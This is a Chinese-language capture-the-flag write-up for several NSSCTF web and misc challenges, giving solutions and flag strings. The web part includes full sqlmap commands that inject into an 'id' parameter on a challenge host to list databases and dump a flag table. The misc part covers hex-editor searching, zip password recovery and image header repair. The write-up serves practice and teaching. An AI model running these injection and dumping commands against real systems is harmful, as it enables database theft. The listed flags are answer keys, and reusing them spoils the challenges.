web
1、PHP是世界上最好的语言!!
直接cat flag

flag=NSSCTF{11eaebe0-3764-410d-be83-b23532a24235}
2、这是什么?SQL !注一下 !

直接查询,发现注入点是id

使用sqlmap列出所以数据库
sqlmap -u "http://node1.anna.nssctf.cn:28755//?id=1" --dbs

available databases [6]:
[*] ctf
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
列出指定数据库的表
第一个里面没什么发现,在第二个库里面看到flag字样
sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1" -D ctftraining --tables

继续列出指定表的字段
sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1" -D ctftraining -T flag --columns

获取指定字段中的数据
sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1" -D ctftraining -T flag -C flag --dump

NSSCTF{759de34b-d02a-4781-a33c-113aba994a10}
Misc
1、Take me hand
使用010editor打开搜寻关键字flag

放入随波逐流解码

NSSCTF{Give_y0ur_hand_to_me!!!_plz}
2、喜欢我的压缩包么
打开附件发现加密了

尝试恢复密码

打开即可看到

NSSCTF{Do-u-like-my-zip-p4ck?}
3、破损的图片
使用010editor打开发现文件头缺失,根据题目提示是破损的图片,且没有出现高亮,应该是png

直接补上pn头,另存为后打开


NSSCTF{May you, the beauty of this world, always shine.}
4、这羽毛球怎么只有一半啊
打开附件,很明显感觉图片高度不够

将高度改高
另存为 打开看到flag

NSSCTF{Fl4g_0fcourse!}
其他的后面会继续更新!



















